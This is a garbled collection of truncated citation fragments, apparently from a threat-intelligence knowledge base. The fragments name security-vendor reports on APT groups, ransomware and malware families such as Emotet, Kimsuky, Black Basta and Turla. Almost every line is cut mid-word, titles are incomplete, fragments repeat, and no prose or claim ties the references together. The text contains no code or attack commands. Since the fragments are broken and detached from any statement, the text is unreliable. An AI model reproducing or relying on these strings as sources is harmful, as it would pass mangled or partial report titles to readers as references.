Mosquito May 2018),(Citation: ESET Operation Groundbait),(Citation: GitHub QuasarRAT),(Citation: Palo Alto Unit 42 OutSteel SaintBot Fe

han Oct 2017),(Citation: FireEye APT30),(Citation: Talos Konni May 2017),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Unit 42

Commands JPCERT)

itation: Securelist Dtrack),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: BiZone Lizar May 2021),(Citation: Mandi
0),(Citation: IBM IcedID November 2017),(Citation: IBM TrickBot Nov 2016),(Citation: Prevx Carberp March 2011),(Citation: Trend Micro T
on: ClearSky Pay2Kitten December 2020),(Citation: SecureWorks August 2019),(Citation: Chaos Stolen Backdoor),(Citation: IBM ZeroCleare
thub September 2018),(Citation: Malwarebytes Emotet Dec 2017),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: Cybersecuri
Novetta Blockbuster RATs),(Citation: Novetta Blockbuster),(Citation: SecureWorks August 2019),(Citation: Unit42 Agrius 2023),(Citation: S

a 2023),(Citation: Symantec Catchamas April 2018),(Citation: ESET RTM Feb 2017),(Citation: Github_SILENTTRINITY),(Citation: Ensilo Darkg

g November 2014),(Citation: FireEye FIN6 April 2016),(Citation: FireEye APT19),(Citation: Github PowerShell Empire),(Citation: Mandiant Cu

t 2024),(Citation: Red Canary SocGholish March 2024),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: Secureworks Gold Prelude Profile

ntBot February 2022 ),(Citation: FireEye SMOKEDHAM June 2021),(Citation: ESET Turla Mosquito May 2018),(Citation: PWC WellMess July
ary 2024),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: MacKeeper Bundlore Apr 2019),(Citation: trendmicro_redcurl),(
A AppleJeus Feb 2021),(Citation: Sandfly BPFDoor 2022),(Citation: ANSSI Sandworm January 2021),(Citation: Leonardo Turla Penquin May
PANDA June 2018),(Citation: ESET BlackEnergy Jan 2016),(Citation: FireEye NETWIRE March 2019),(Citation: Mandiant UNC3313 Feb 2022)
soft Volt Typhoon May 2023),(Citation: Mandiant APT41),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Cybereason Cobalt Kitty

vanti Zero-Day Exploitation January 2024),

July2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: MalwareBytes SideCopy Dec 20

tation: McAfee Lazarus Jul 2020),(Citation: FireEye EPS Awakens Part 2),(Citation: Accenture HyperStack October 2020),(Citation: Talos Tin

une 2017),(Citation: Kaspersky Flame Functionality),(Citation: Mandiant_UNC2165),(Citation: ClearSky Pay2Kitten December 2020),(Citatio
y NETWIRE January 2020),(Citation: objsee mac malware 2017),(Citation: Unit42 CookieMiner Jan 2019),(Citation: TrendMicro macOS Dacl

dix),(Citation: Symantec Wiarp May 2012),(Citation: Securelist Kimsuky Sept 2013),(Citation: FireEye Operation Double Tap),(Citation: FOX
018),(Citation: ESET EvasivePanda 2023),(Citation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT34 July 2019),(Citation: FireEye APT3

Citation: CrowdStrike StellarParticle January 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Netscout Stolen Pencil Dec 2018),(Citation

tial Manager)
perGate January 2022),(Citation: Talos Olympic Destroyer 2018),(Citation: Cybereason WhisperGate February 2022),(Citation: McAfee Sham

McAfee Bankshot),
nfly),(Citation: Talos Manjusaka 2022),(Citation: Palo Alto menuPass Feb 2017),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: CheckPoi
021),(Citation: Mandiant FIN7 Apr 2022),(Citation: NCC Group WastedLocker June 2020),(Citation: CrowdStrike Carbon Spider August 2021

3),(Citation: Kaspersky Lyceum October 2021),(Citation: Unit42 BendyBear Feb 2021),

Scarlet Mimic Jan 2016),(Citation: McAfee-GhostSecret-fixurl),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: E

FireEye APT30),(Citation: Mandiant FIN13 Aug 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cy

BANAK June 2017),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Palo Alto Oi

1),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: PWC We

tealer 2014),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Microsoft SIR Vol 19),(Citation: TrendMicro Patchwork Dec 2017),(Cita
Point Black Basta October 2022),(Citation: Malwarebytes RokRAT VBA January 2021),
on: BlackBerry Black Basta May 2022),(Citation: Check Point Black Basta October 2022),(Citation: Cyble Black Basta May 2022),(Citation: Pa
k July 2020),(Citation: CISA SoreFang July 2016),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro

),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: CISA AppleJeus Feb 2021),(Citation: F-Secure The Dukes)

WhisperGate January 2022),(Citation: Trend Micro KillDisk 1),(Citation: Symantec Shamoon 2012),(Citation: Novetta Blockbuster),(Citation:
Elastic Latrodectus May 2024),(Citation: Github PowerShell Empire),(Citation: FireEye FIN6 Apr 2019),(Citation: DFIR_Quantum_Ransomwa

bit),(Citation: Kaspersky Darkhotel),(Citation: Volexity Ocean Lotus November 2020),(Citation: Symantec Elderwood Sept 2012),(Citation: IB
tation: Proofpoint Operation Transparent Tribe March 2016),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Unit42 Red

n 2021),(Citation: ESET Ebury Feb 2014),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: BlackBerry CostaRicto November 2020),(Citati

eason Kimsuky November 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Kroll Qakbot June 2020),(Citatio
UM March 2020),(Citation: KISA Operation Muzabi),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Mandiant APT29 Eye Spy Email Nov
ary 2022),(Citation: FireEye TEMP.Veles 2018),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Cybereason Chaes Nov 2020),
C WellMess C2 August 2020),(Citation: Cisco Operation Layover September 2021),(Citation: Talos TinyTurla September 2021),(Citation: NC
DHAM June 2021),(Citation: PWC WellMess July 2020),(Citation: Check Point Warzone Feb 2020),(Citation: Bitdefender APT28 Dec 2015),(C

4),(Citation: DOJ Iran Indictments March 2018),(Citation: KISA Operation Muzabi),(Citation: Mandiant APT43 March 2024),(Citation: IBM IT
esekitten August 2021),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Star Blizzard August 2022),(Citation: Volexity Ocea
b PoshC2),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Microsoft 365 Defender Solorigate),(Citation: Bitdefender FIN8 Ju
oft Albanian Government Attacks September 2022),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Crowds

: TechNet Firewall Design)

diant Cutting Edge Part 2 January 2024),(Citation: F-Secure Cosmicduke),(Citation: McAfee Gold Dragon),(Citation: Bitdefender FunnyDrea
ecurelist Kimsuky Sept 2013),(Citation: FireEye APT30),(Citation: Carbon Black HotCroissant April 2020),(Citation: FOX-IT May 2016 Mofang

ation: Github PowerShell Empire),(Citation: Bitdefender Naikon April 2021),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citati

on: DFIR Report APT35 ProxyShell March 2022),(Citation: Microsoft East Asia Threats September 2023),(Citation: Volexity Exchange Marau
Carnegie Mellon University Supernova Dec 2020),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Cylance Dust Storm),(Citation: RiskIQ

soft PLATINUM April 2016),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Github PowerShell Empire),(Citation: F-Secure The
n: Github PowerShell Empire),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Crowdstrike Qakbot October
bbit 2018),(Citation: FireEye Respond Webinar July 2017),(Citation: ESET BlackEnergy Jan 2016),(Citation: Aqua Kinsing April 2020),(Citation
semium June 2021),(Citation: ESET PipeMon May 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: ANSSI Sandworm Januar
pt 2013),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Avertium Black Basta June 2022),(Citation: CISA SoreFang July 2016),(Citation: R

ligence Group),

023),(Citation: SCILabs Malteiro 2021),(Citation: Unit42 SilverTerrier 2018),(Citation: SentinelOne INC Ransomware),(Citation: SWAT-hospi
ran Indictments March 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: SecureWorks August 2019),(Citation: CISA AA24-038A

nd Micro Black Basta October 2022),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Ensilo Darkgate 2018),(Citation: ESET Attor Oc

ye APT19),(Citation: Microsoft Actinium February 2022),(Citation: Medium Metamorfo Apr 2020),(Citation: Alperovitch 2014),(Citation: Ma

ntinelOne Valak June 2020),(Citation: Cyberreason Anchor December 2019),(Citation: InsiderThreat NTFS EA Oct 2017)

Security),(Citation: Vulnerability and Exploit Detector),(Citation: FireEye DLL Side-Loading),(Citation: Powersploit)

LIGHT Ransomware Operations June 2022),(Citation: Mandiant APT1 Appendix),(Citation: Github PowerShell Empire),(Citation: Crowdstrik
Chimera January 2021),(Citation: Microsoft Wingbird Nov 2017),(Citation: Proofpoint TA459 April 2017),(Citation: Cybereason Soft Cell Jun
Comet Sept 2014),(Citation: Sandfly BPFDoor 2022),(Citation: DigiTrust NanoCore Jan 2017),(Citation: FoxIT Wocao December 2019),(Citati
iathan Oct 2017),(Citation: Securelist Kimsuky Sept 2013),(Citation: Cylance Sodinokibi July 2019),(Citation: Fortinet Diavol July 2021),(Cita

ovember 2020),(Citation: Lazarus APT January 2022),(Citation: Prevailion DarkWatchman 2021),(Citation: Proofpoint Leviathan Oct 2017),(C

ur Enemy FIN8 Aug 2016),(Citation: FoxIT Wocao December 2019),(Citation: Symantec Hydraq Jan 2010),(Citation: McAfee Gold Dragon),(C
C PANDA December 2021),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Lumen Versa 2024),(Citation: Secureworks Kar

LLCHILL Nov 2017),(Citation: NHS UK BLINDINGCAN Aug 2020),(Citation: PWC KeyBoys Feb 2017),(Citation: ESET DazzleSpy Jan 2022),(Cita

ecureworks DarkTortilla Aug 2022),(Citation: Cisco Operation Layover September 2021),(Citation: DomainTools WinterVivern 2021),(Citati
2022),(Citation: Kaspersky Sodin July 2019),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Talos Olympic Destroyer 2018),(Cita

eb 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: FireEye NETWIRE March 2019),(Citation: DustySky),(Citation: Mandiant APT1 A

ec 2017),(Citation: Microsoft COM ACL),(Citation: Microsoft System Wide Com Keys),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citatio
ug 2022),(Citation: Securelist MuddyWater Oct 2018),(Citation: Bitsight Latrodectus June 2024),(Citation: Microsoft NICKEL December 2021
Citation: Talos GravityRAT),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: TrendMicr
on: DustySky),(Citation: PsExec Russinovich),(Citation: LogRhythm WannaCry),(Citation: Booz Allen Hamilton),(Citation: FireEye FIN10 June

csset xcode project 2020),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: ESET Dukes October 2019),(Citation: MSTIC Fo

ant FIN13 Aug 2022),(Citation: FOX-IT May 2016 Mofang),(Citation: Talos TinyTurla September 2021),(Citation: Glitch-Cat Green Lambert A
,(Citation: wardle evilquest partii),(Citation: Group IB APT 41 June 2021),(Citation: Medium Metamorfo Apr 2020),(Citation: Mandiant APT

PT 41 June 2021),(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit 42 QUADAG

berp October 2010),(Citation: MSTIC FoggyWeb September 2021),(Citation: Lastline PlugX Analysis),(Citation: Palo Alto Unit 42 OutSteel Sa

obalt Kitty 2017),(Citation: Debian nbtscan Nov 2019),(Citation: CERT-FR PYSA April 2020),(Citation: Github PowerShell Empire),(Citation: E
ess INC Ransom Group August 2023),(Citation: Google Cloud APT41 2024),(Citation: NCC Group Team9 June 2020),(Citation: Symantec Ora
ec 2018),(Citation: US District Court Indictment GRU Oct 2018),(Citation: Trend Micro Banking Malware Jan 2019),(Citation: Kaspersky Turla
ation: Aquino RARSTONE),(Citation: Red Canary NETWIRE January 2020),(Citation: Cylance Dust Storm),(Citation: Unit42 OceanLotus 2017
A Quasar RAT December 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Fidelis TrickBot Oct 2016),(Citation: ESE
Oct 2018),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Symantec Suckfly May 2016),(Citation: Cylance Shaheen Nov 20

tion: Microsoft Replication ACL)

MuddyWater Dec 2018),(Citation: F-Secure The Dukes),(Citation: Core Security Impacket),(Citation: Symantec Leafminer July 2018),(Citation
1),(Citation: PowerSploit Documentation),(Citation: Cybereason Oceanlotus May 2017),(Citation: NCSC Joint Report Public Tools),(Citation
ndiant FIN12 Oct 2021),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: FireEye FIN6 Apr 2019),(Citation: Cybersecu

reEye APT33 Guardrail),(Citation: Deply Mimikatz),(Citation: Symantec Backdoor.Mivast),(Citation: CISA GRU29155 2024),(Citation: Secure
AR21-126A FIVEHANDS May 2021),(Citation: Bitdefender APT28 Dec 2015),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: FireEye
Citation: ESET Dukes October 2019),(Citation: ASERT Donot March 2018),(Citation: Elastic Latrodectus May 2024),(Citation: ESET Gelsemium
n: ESET Turla PowerShell May 2019),(Citation: Bromium Ursnif Mar 2017),(Citation: ESET Machete July 2019),(Citation: ESET ComRAT May

Citation: SentinelOne Agrius 2021),(Citation: Google Cloud APT41 2022),(Citation: CheckPoint Agrius 2023),(Citation: Latrodectus APR 202
Securelist Brazilian Banking Malware July 2020),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: F-Secure CozyDuke),(Citation
ESET Gelsemium June 2021),(Citation: ESET PipeMon May 2020),(Citation: SentinelOne Valak June 2020),(Citation: Joint Cybersecurity Ad

: Cobalt Strike Manual 4.3 November 2020),(Citation: Palo Alto OilRig April 2017),(Citation: PowerSploit Documentation),(Citation: TrendM

HotCroissant April 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: Unit42 Sofacy Dec 2018),(Citation: Cisco Operation Layover Septe
Spalax Jan 2021),(Citation: Zscaler Pikabot 2023),(Citation: ClearSky MuddyWater Nov 2018),(Citation: GitHub Invoke-PSImage),(Citation: A

LazyScripter Feb 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: FSI Andariel Campaign Rifle July 2017),(Citation: NSA NCSC Turla O
ep 2020),(Citation: ESET Operation Spalax Jan 2021),(Citation: Mandiant FIN7 Apr 2022),(Citation: FireEye APT28 Hospitality Aug 2017),(Cit

ET Attor Oct 2019),(Citation: Microsoft Actinium February 2022),(Citation: Kaspersky Equation QA),(Citation: Eset Ramsay May 2020),(Citati
us May 2024),(Citation: FireEye FIN6 Apr 2019),(Citation: Savill 1999),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Sy
ation: Baumgartner Naikon 2015),(Citation: Unit 42 Kazuar May 2017),(Citation: GitHub PoshC2),(Citation: NTT Security Flagpro new Dece

,(Citation: Proofpoint TA453 March 2021),(Citation: Proofpoint TA427 April 2024),(Citation: Google TAG Ukraine Threat Landscape March

ruary 2021),(Citation: Check Point Warzone Feb 2020),(Citation: FireEye APT19),(Citation: US-CERT Emotet Jul 2018),(Citation: FireEye Kno
nd Micro Qakbot December 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Trend Micro TA505 June 2019),(Citation: Proofpoint Lev

curity Intelligence More Eggs Aug 2019),(Citation: Google EXOTIC LILY March 2022),

Trends 2016),(Citation: FireEye Bootkits),(Citation: TechNet Secure Boot Process),(Citation: TCG Trusted Platform Module)

aspersky Lab SynAck May 2018),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Secureworks Gold Prelude Profile),(Citation: Cybere
pt 2013),(Citation: Talos Smoke Loader July 2018),(Citation: Segurança Informática URSA Sophisticated Loader 2020),(Citation: Cisco Opera

tion: AlienVault Sykipot 2011),(Citation: Talos ZxShell Oct 2014),(Citation: Kaspersky TajMahal April 2019),(Citation: Proofpoint TA505 Oct

ck Oct 2016),(Citation: S2 Grupo TrickBot June 2017),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: ATT QakBot April 2021),(Cita

2018),(Citation: Trend Micro Black Basta October 2022),(Citation: FireEye FIN6 April 2016),(Citation: CrowdStrike PIONEER KITTEN August
on: NJCCIC Ursnif Sept 2016),(Citation: Securelist fileless attacks Feb 2017),(Citation: MalwareBytes Ngrok February 2020),(Citation: Sygnia

2018),(Citation: BitDefender Chafer May 2020),(Citation: DOJ GRU Indictment Jul 2018),(Citation: FireEye Operation Double Tap),(Citation:
Cat June 2022),(Citation: FireEye APT30),(Citation: CrowdStrike StellarParticle January 2022),(Citation: ESET Sednit Part 2),(Citation: Cobalt
Malware May 2023),(Citation: FoxIT Wocao December 2019),(Citation: Dragos Crashoverride 2017),(Citation: MSTIC Nobelium Oct 2021),(C
: Talos TinyTurla September 2021),(Citation: Unit42 BendyBear Feb 2021),(Citation: Unit 42 Valak July 2020),(Citation: ESET Turla PowerSh
on: Binary Defense Emotes Wi-Fi Spreader),(Citation: Lazarus APT January 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citati
balt Aug 2017),(Citation: McAfee Night Dragon),(Citation: ESET RTM Feb 2017),(Citation: Anomali Static Kitten February 2021),(Citation: US
mblebee August 2022),(Citation: Check Point Warzone Feb 2020),(Citation: Mandiant FIN12 Oct 2021),(Citation: CERT-FR PYSA April 2020),(
tion: Talos Olympic Destroyer 2018),(Citation: McAfee Night Dragon),(Citation: apt41_dcsocytec_dec2022),(Citation: Trend Micro Black Ba
ntezer TeamTNT September 2020),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: FireEye APT39 Jan 2019),(Citation: Anom
e mac malware 2017),

n: DFIR Conti Bazar Nov 2021),(Citation: Microsoft Volt Typhoon May 2023),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Arc
arent Tribe August 2020),(Citation: FireEye APT30),(Citation: ESET Sednit USBStealer 2014),(Citation: Microsoft SIR Vol 19),(Citation: Sentin

tion: RedCanary Mockingbird May 2020),(Citation: Cisco Talos Intelligence Group),

oup),(Citation: Trend Micro Skidmap),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: Symantec APT28 Oct 2018),(Citation: ESET LoJ

m Anchor DNS July 2020),(Citation: Unit42 Xbash Sept 2018),

7),(Citation: DFIR_Quantum_Ransomware),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint TA2541 February 2022),(Citation

kitten August 2021),(Citation: Talos TinyTurla September 2021),(Citation: cobaltstrike manual),(Citation: University of Birmingham C2)
ymantec Dragonfly),(Citation: Talos Manjusaka 2022),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: DOJ GRU Indictment J
sory SVR TTP May 2021),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: CrowdStrike Deep Panda Web Shells),(Citation: C

2020),(Citation: SecureWorks WannaCry Analysis),(Citation: Palo Alto Unit 42 EKANS),(Citation: CERT-FR PYSA April 2020),(Citation: Unit42
Eric Chien February 2011),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Gh0stRAT ATT March 2019),(Citation: Cybereason Astaro

r 2018),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: HP SVCReady Jun 2022),(Citation: ESET RTM Feb 2017),(
nt Tribe August 2020),(Citation: Lumen KVBotnet 2023),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: TechNet Netsh),(Citation:

EXOTIC LILY March 2022),(Citation: ClearSky Lazarus Aug 2020),(Citation: Kaspersky LuminousMoth July 2021),(Citation: Unit 42 Gamared

,(Citation: Kroll Qakbot June 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: Google TAG COLDRIVER January 2024),(Citation: Kasp

2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Harmj0y Kerberoast Nov

20),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: U

: US District Court Indictment GRU Unit 74455 October 2020),(Citation: ESET EvasivePanda 2024),(Citation: Crowdstrike GTR2020 Mar 202
ation Muzabi),(Citation: Rewterz Sidewinder APT April 2020),(Citation: CISA AA20-301A Kimsuky),(Citation: Cisco Operation Layover Septem
eeping Computer Latrodectus April 2024),(Citation: ESET LoudMiner June 2019),(Citation: Profero APT27 December 2020),(Citation: ESET

balt Group Nov 2017),(Citation: Red Canary Dridex Threat Report 2021),(Citation: Trend Micro Black Basta October 2022),(Citation: Cyberin
peration Spalax Jan 2021),(Citation: Mandiant FIN7 Apr 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Korean FSI TA505 2020),(Citatio

itation: DomainTools WinterVivern 2021),(Citation: CISA SoreFang July 2016),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Nicolas Fal
0),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: CISA AR18-352A Quasar RAT December 2018),
n: Kaspersky Ferocious Kitten Jun 2021),(Citation: Sophos Gootloader),(Citation: Talos Zeus Panda Nov 2017),(Citation: Cylance Dust Storm
itation: Secureworks Karagany July 2019),(Citation: PWC WellMess July 2020),(Citation: ASERT Donot March 2018),(Citation: ESET Operatio
2022),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: McAfe

y Poseidon Group),(Citation: BiZone Lizar May 2021),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: FireEye APT41 Aug 2019),(Citation
2021),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Palo Alto OilRig Oct 2016),(Citation: Mandiant APT1 Appendix),(Citation

2021),(Citation: US-CERT Volgmer Nov 2017),(Citation: Talos ZxShell Oct 2014),(Citation: Proofpoint LookBack Malware Aug 2019),(Citatio

Citation: Medium S2W WhisperGate January 2022),(Citation: Talos ZxShell Oct 2014),(Citation: Cylance Cleaver),(Citation: Palo Alto Brute R
Hermetic Wiper February 2022),(Citation: FireEye APT38 Oct 2018),(Citation: SentinelOne Agrius 2021),(Citation: US-CERT SHARPKNOT Jun
ee GhostSecret),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit42 BendyBear Feb 2021),(Citation: DFIR Conti Bazar Nov 2021),(Cita
nds JPCERT),(Citation: NSA MS AppLocker),(Citation: Beechey 2010),(Citation: Corio 2008),(Citation: Mandiant Cloudy Logs 2023),(Citation:
Uptycs Confucius APT Jan 2021),(Citation: Unit 42 Inception November 2018),(Citation: Anomali Template Injection MAR 2018),(Citation: M

November 2020),(Citation: Microsoft POLONIUM June 2022),(Citation: therecord_redcurl),(Citation: FireEye APT10 April 2017),(Citation: M

drail),(Citation: CERT-FR PYSA April 2020),(Citation: CISA GRU29155 2024),(Citation: US-CERT Emotet Jul 2018),(Citation: Github PowerShel

ikatz Guide),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: FoxIT Wocao December 2019),(Citation: Sentin
on: CISA AA20-301A Kimsuky),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Microsoft SIR Vol 19),(Citation: NCSC Joint Report Public T

s February 2021),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Check Point Warzone Feb 2020),(Citation: FireEye APT19),

nt TA2541 February 2022),(Citation: Trend Micro Qakbot December 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Trend Micro TA5
August 2021),(Citation: Symantec Seaduke 2015),(Citation: FireEye APT41 Aug 2019),(Citation: Cybereason INC Ransomware November 20
tial Theft),(Citation: Microsoft Common Conditional Access Policies),(Citation: AWS - IAM Console Best Practices),(Citation: Microsoft Azure

on: FoxIT Wocao December 2019),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Kaspersky ToddyCat Check Logs Octo
reEye FIN10 June 2017),(Citation: FoxIT Wocao December 2019),(Citation: Malwarebytes Emotet Dec 2017),(Citation: cobaltstrike manual)
05 April 2020),(Citation: Check Point Warzone Feb 2020),(Citation: Anomali Static Kitten February 2021),(Citation: DigiTrust Agent Tesla Ja
t 42 Gamaredon February 2022),(Citation: Proofpoint Bumblebee April 2022),(Citation: Talos Bisonal Mar 2020),(Citation: ESET Operation S
T Donot March 2018),(Citation: Secureworks Karagany July 2019),(Citation: HP SVCReady Jun 2022),(Citation: Palo Alto Unit 42 OutSteel Sa
itation: Cyberint Qakbot May 2021),(Citation: Symantec RAINDROP January 2021),(Citation: Unit42 Clop April 2021),(Citation: CISA AppleJe

ception Framework March 2018),(Citation: Accenture HyperStack October 2020),(Citation: Volexity Ocean Lotus November 2020),(Citation
tion: IBM Grandoreiro April 2020),(Citation: ASERT Donot March 2018),(Citation: ESET Turla Mosquito May 2018),(Citation: FireEye Perisco
oint Monsoon),(Citation: FireEye APT17),(Citation: Anomali Rocke March 2019),(Citation: Check Point APT35 CharmPower January 2022),(

ation: cobaltstrike manual),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Unit 42 OilRig Sept 2018),(Citation: Mandiant FIN13 Aug 20
Citation: Check Point Warzone Feb 2020),(Citation: Securelist ScarCruft May 2019),(Citation: Ensilo Darkgate 2018),(Citation: CISA AppleJeu

ation),(Citation: IBM MegaCortex),(Citation: Sophos BlackCat Jul 2022),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Cit

18),(Citation: CheckPoint Naikon May 2020),(Citation: emotet_hc3_nov2023),(Citation: FireEye Op RussianDoll),(Citation: GitHub SILENTTR

n: CrowdStrike IceApple May 2022),(Citation: Trend Micro Black Basta October 2022),(Citation: Mandiant Operation Ke3chang November 2

iscope March 2018),(Citation: S2 Grupo TrickBot June 2017),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: DigiTrust Agent Tesla

20),(Citation: CISA AppleJeus Feb 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: District Court of NY APT10 Indictment De

Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Google Election Threats October 2020),(Citation: HackerNews IndigoZebra July 20

cember 2021),
nical Analysis),(Citation: Talos Cobalt Group July 2018),(Citation: PWC WellMess July 2020),(Citation: Trend Micro Black Basta October 2022
tation: US-CERT TA18-074A),(Citation: Talos Cobalt Strike September 2020),(Citation: FireEye APT41 March 2020),(Citation: Cylance Mache
hreatpost Sauron),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Cybersecurity Advisory GRU Bru

ESET Industroyer),(Citation: Mandiant APT41),(Citation: Trend Micro Qakbot May 2020),(Citation: Proofpoint TA459 April 2017),(Citation: C
ampaign November 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Prevailion DarkWatchman 2021),(Citation: Volexity PowerDuke No
Neuron May 2019),(Citation: Cybereason PowerLess February 2022),(Citation: CISA GRU29155 2024),(Citation: District Court of NY APT10 In
er FunnyDream Campaign November 2020),(Citation: CopyKittens Nov 2015),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citatio
l April 2019),(Citation: PaloAlto CardinalRat Apr 2017),
re May 2024),(Citation: PWC Cloud Hopper April 2017),(Citation: Volexity Exchange Marauder March 2021),(Citation: McAfee Honeybee),(
persky Transparent Tribe August 2020),(Citation: Kaspersky Flame Functionality),(Citation: Symantec Daggerfly 2023),(Citation: Imminent U
t February 2022 ),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: ESET Crutch December 2020),(Citation: FireEye FIN6 Ap
2021),(Citation: group-ib_redcurl2),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Proofpoint Operation Transparent Tribe Mar

ITS May 2007),(Citation: Microsoft BITS)

o Unit 42 OutSteel SaintBot February 2022 ),(Citation: TrendMicro PE_URSNIF.A2),(Citation: Check Point Warzone Feb 2020),(Citation: Bitd

en Jun 2021),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Talos Micropsia June 2017),(Citation: Palo Alto OilRig May 2016),(Citation:

ar May 2021),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Scarlet Mimic Jan 2016),(Citation: CISA AA24-038A PRC Critical Infrastruct
2011),(Citation: Trend Micro Trickbot Nov 2018),
oor),(Citation: IBM ZeroCleare Wiper December 2019),(Citation: FireEye APT41 Aug 2019),(Citation: Unit42 Agrius 2023),(Citation: ClearSky
reader),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Okta Block Anonymizing Services),(Citation: Micr
nit42 Agrius 2023),(Citation: Secure List Bad Rabbit),(Citation: Microsoft Targeting Elections September 2020),(Citation: Okta Block Anonym

TRINITY),(Citation: Ensilo Darkgate 2018),(Citation: ESET Attor Oct 2019),(Citation: Github PowerShell Empire),(Citation: F-Secure Cosmicdu

Empire),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: FireEye FIN6 Apr 2019),(Citation: Unit42 OilRig Nov 2018),(Citation

cureworks Gold Prelude Profile),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Securelist Brazilian Banking Malware July 2020),(Citatio

,(Citation: PWC WellMess July 2020),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Cita
